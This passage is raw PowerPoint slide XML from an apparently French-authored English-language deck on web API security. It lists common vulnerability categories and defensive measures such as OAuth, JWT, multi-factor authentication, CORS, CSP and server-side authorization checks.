              <a:t> &amp; Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Management, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Broken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Control, Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Protection, Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Underprotected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> API, JSONP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7524667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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>JWT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>OAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>multi-factor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>authentication, …</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Adress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>pproach </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>to secure your request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>URIs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Implement Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>layer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>and Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>object security</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>eparation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>of concerns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>reusability, support </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>for rich clients and web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>realm</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, group, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, permission, right management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3697686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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="915566"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>API Management</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Framework &amp; Custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>implementation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41738589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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="204550"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>	      	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API Protection</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07504" y="843558"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>HTML5 technologies  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="540000" lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Same-origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>SOP), Content Security Policy (CSP), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> Resource Sharing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> (CORS) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Protection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> on custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>implementation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Filters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Interceptors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, Annotations (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>JSR-250</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>spring-security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>…), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> Direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t> Reference (IDOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> portions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>depending</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t> on user profil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0"/>
              <a:t>Mitigation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(not a protection!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Combined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> server-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> API protection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> implementation : « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>ngIf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> » directive or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>dedicated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> module (</a:t>
            </a:r>
            <a:r>
